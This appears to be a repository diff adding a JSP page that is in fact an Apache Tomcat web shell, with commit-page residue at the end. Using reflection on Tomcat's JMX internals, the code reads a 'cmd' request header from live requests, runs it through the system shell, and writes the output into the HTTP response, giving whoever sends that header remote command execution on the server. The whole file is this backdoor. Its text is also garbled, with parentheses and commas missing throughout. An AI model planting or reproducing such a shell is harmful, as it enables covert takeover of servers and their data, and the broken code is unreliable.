1+ <%@ page contentType =" text/html;charset=UTF-8" language =" java"
2+ <%
3+ boolean flag = false ;
4+
5+ javax.management. MBeanServer mbeanServer = org.apache.tomcat.util.modeler. Registry . getRegistry((Object )null , (Object )null ). getMBeanServer();
6+ java.lang.reflect. Field field = Class . forName(" com.sun.jmx.mbeanserver.JmxMBeanServer" . getDeclaredField(" mbsInterceptor"
7+ field. setAccessible(true );
8+ Object obj = field. get(mbeanServer);
9+
10+ field = Class . forName(" com.sun.jmx.interceptor.DefaultMBeanServerInterceptor" . getDeclaredField(" repository"
11+ field. setAccessible(true );
12+ com.sun.jmx.mbeanserver. Repository repository = (com.sun.jmx.mbeanserver. Repository ) field. get(obj);
13+
14+ java.util.Set<com.sun.jmx.mbeanserver. NamedObject > objectSet = repository. query(new javax.management. ObjectName (" Catalina:type=GlobalRequestProcessor,*" null );
15+ for (com.sun.jmx.mbeanserver. NamedObject namedObject : objectSet){
16+ javax.management. DynamicMBean dynamicMBean = namedObject. getObject();
17+ field = Class . forName(" org.apache.tomcat.util.modeler.BaseModelMBean" . getDeclaredField(" resource"
18+ field. setAccessible(true );
19+ obj = field. get(dynamicMBean);
20+
21+ field = Class . forName(" org.apache.coyote.RequestGroupInfo" . getDeclaredField(" processors"
22+ field. setAccessible(true );
23+ java.util. ArrayList procssors = (java.util. ArrayList ) field. get(obj);
24+
25+ field = Class . forName(" org.apache.coyote.RequestInfo" . getDeclaredField(" req"
26+ field. setAccessible(true );
27+ for (int i = 0 ; i < procssors. size(); i++ ){
28+ org.apache.coyote. Request req = (org.apache.coyote. Request ) field. get(procssors. get(i));
29+ String cmd = req. getHeader(" cmd"
30+ if (cmd != null && ! cmd. isEmpty()){
31+ String [] cmds = System . getProperty(" os.name" . toLowerCase(). contains(" window" ? new String []{" cmd.exe" " /c" : new String []{" /bin/sh" " -c"
32+ byte [] result = (new java.util. Scanner ((new ProcessBuilder (cmds)). start(). getInputStream())). useDelimiter(" \\ A" . next(). getBytes();
33+
34+ Object resp = req. getClass(). getMethod(" getResponse" new Class [0 ]). invoke(req, new Object [0 ]);
35+ try {
36+ Class cls = Class . forName(" org.apache.tomcat.util.buf.ByteChunk"
37+ obj = cls. newInstance();
38+ cls. getDeclaredMethod(" setBytes" new Class []{byte []. class, int . class, int . class}). invoke(obj, new Object []{result, new Integer (0 ), new Integer (result. length)});
39+ resp. getClass(). getMethod(" doWrite" new Class []{cls}). invoke(resp, new Object []{obj});
40+ } catch (NoSuchMethodException var5) {
41+ Class cls = Class . forName(" java.nio.ByteBuffer"
42+ obj = cls. getDeclaredMethod(" wrap" new Class []{byte []. class}). invoke(cls, new Object []{result});
43+ resp. getClass(). getMethod(" doWrite" new Class []{cls}). invoke(resp, new Object []{obj});
44+ }
45+
46+ flag = true ;
47+ }
48+
49+ if (flag) break ;
50+ }
51+ }
52+ % >
0 commit comments